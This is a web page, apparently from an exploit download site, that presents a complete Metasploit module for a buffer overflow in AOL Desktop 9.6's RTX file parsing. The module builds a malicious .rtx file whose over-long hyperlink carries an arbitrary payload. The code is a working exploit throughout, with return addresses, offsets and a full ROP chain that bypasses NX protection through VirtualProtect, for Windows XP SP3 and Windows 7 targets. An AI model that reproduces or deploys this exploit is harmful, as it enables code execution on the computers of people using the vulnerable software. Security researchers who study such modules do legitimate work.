read, write, eXecute…

AOL Desktop 9.6 .rtx file parsing buffer overflow vulnerability download
##
# $Id: aol_desktop_linktag.rb 13967 2011-10-17 03:49:49Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::FILEFORMAT

        def initialize(info={})
                super(update_info(info,
                        'Name'           => "AOL Desktop 9.6 RTX Buffer Overflow",
                        'Description'    => %q{
                                        This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
                                component. By supplying a long string of data in the hyperlink tag, rich.rct copies
                                this data into a buffer using a strcpy function, which causes an overflow, and
                                results arbitrary code execution.
                        },
                        'License'            => MSF_LICENSE,
                        'Version'            => "$Revision: 13967 $",
                        'Author'         =>
                                [
                                        'sup3r',        #Initial disclosure, poc (9.5)
                                        'sickn3ss',     #9.6 poc
                                        'sinn3r',       #Metasploit
                                        'mr_me',        #NX bypass target
                                        'silent_dream', #Win 7 target
                                ],
                        'References'     =>
                                [
                                        [ 'OSVDB', '70741'],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/16085/' ],
                                ],
                        'Payload'            =>
                                {
                                        'Space'           => 400,
                                        'BadChars'        => "\x00\x0d\x0a\x3e\x7f",
                                        'StackAdjustment' => -3500,
                                },
                        'DefaultOptions' =>
                                {
                                        'ExitFunction' => "process",
                                },
                        'Platform'       => 'win',
                        'Targets'            =>
                                [
                                        [
                                                'AOL Desktop 9.6 on Windows XP SP3',
                                                {
                                                        'Ret'   => 0x01DB4542,  #0x01DB4542 JMP ESI
                                                        'Offset'=> 5391,        #Offset to EIP
                                                        'Max'   => 8000,        #Buffer max. Can be more.
                                                },
                                        ],
                                        [
                                                'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
                                                {
                                                        'Ret'    => 0x6C02D216,  # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
                                                        'vp'     => 0x7C801AD4,  # (kernel32.dll) => VirtualProtect()
                                                        'Offset' => 5368,        # offset to rop
                                                        'Max'    => 8000,        # Buffer max. Can be more.
                                                },
                                        ],
                                        [
                                                'AOL Desktop 9.6 on Windows 7',
                                                {
                                                        'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
                                                        'Offset' => 4327,        # Offset to EIP
                                                        'Max'    => 8000,        # Buffer max. Can be more
                                                }
                                        ],
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => "Jan 31 2011",
                        'DefaultTarget'  => 0))

                        register_options(
                                [
                                        OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
                                ]
                        )
        end


        def exploit

                if target.name =~ /XP SP3$/

                        # Compatible with what the poc has, and what I see on my debugger
                        sploit  = ''
                        sploit << rand_text_alpha(4968+7)
                        sploit << payload.encoded
                        sploit << rand_text_alpha(5368-sploit.length)
                        sploit << make_nops(11)
                        sploit << "\xe9\x70\xfe\xff\xff"  #JMP back 400 bytes
                        sploit << [target.ret].pack('V')
                        sploit << make_nops(target['Offset']-sploit.length-2)
                        sploit << "\xeb\x04"
                        sploit << [target.ret].pack('V')
                        sploit << payload.encoded
                        sploit << rand_text_alpha(target['Max']-sploit.length)

                elsif target.name =~ /SP3 - NX bypass$/

                        #Thanks mr_me for the ROP chain

                        rop = ''
                        # This is the start of ESI
                        rop << rand_text_alpha(4) # junk - > POP ESI
                        rop << rand_text_alpha(4) # junk - > POP EDI
                        rop << rand_text_alpha(4) # junk - > POP EDI
                        rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN

                        # Take control of the stack pointer right here (EIP)
                        rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
                        rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer

                        # Arg 4 of VirtualProtect() -> lpflOldProtect
                        rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^

                        # Arg 2 of VirtualProtect() -> dwsize (0x212C) & setup EAX
                        rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
                        rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
                        rop << rand_text_alpha(4) # junk -------------------------------------------^^
                        rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN

                        # Arg 3 of VirtualProtect() -> lpflOldProtectflNewProtect (PAGE_EXECUTE_READWRITE)
                        rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
                        rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
                        rop << rand_text_alpha(4) # junk --------------------------------------^^
                        rop << "\xbb\x07\x98\x64" # 0x649807BB (ebook.dll) => XCHG EAX,EDX; RETN
                        rop << rand_text_alpha(4) # junk ----------------------------------------------^^

                        # Arg 1 of VirtualProtect() -> return address & lpAddress
                        # Also, setup call to VirtualProtect() ptr in ESI
                        rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
                        rop << "\x2c\x10\x49\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBP; RETN
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
                        rop << rand_text_alpha(4) # junk ---------------------------------^^
                        rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
                        rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
                        rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN

                        # Continue safely, rop nop
                        rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
                        rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^

                        # gently place our code on the stack
                        rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN

                        sploit = rand_text_alpha(target['Offset']-602) #688 was the original

                        #mr_me's offset
                        sploit << rop
                        sploit << make_nops(74)
                        sploit << payload.encoded

                        #padding to the next offset
                        sploit << rand_text_alpha(7)

                        #the next offset
                        sploit << rop
                        sploit << make_nops(74)
                        sploit << payload.encoded

                        #Padding
                        sploit << rand_text_alpha(target['Max']-sploit.length)

                elsif target.name =~ /Windows 7/

                        #Thanks silent_dream

                        sploit  = ''
                        sploit << rand_text_alpha(target['Offset']-2-14)
                        sploit << "\xeb\x13"
                        sploit << make_nops(14)
                        sploit << [target.ret].pack('V')
                        sploit << make_nops(15)
                        sploit << payload.encoded
                        sploit << rand_text_alpha(target['Max'] - sploit.length)

                end

                link_value = rand_text_alpha(6)

                rtx  = "<HTML>"
                rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
                rtx << "</HTML>"

                print_status("Creating #{datastore['FILENAME']}...")
                file_create(rtx)
        end
end
example usage
-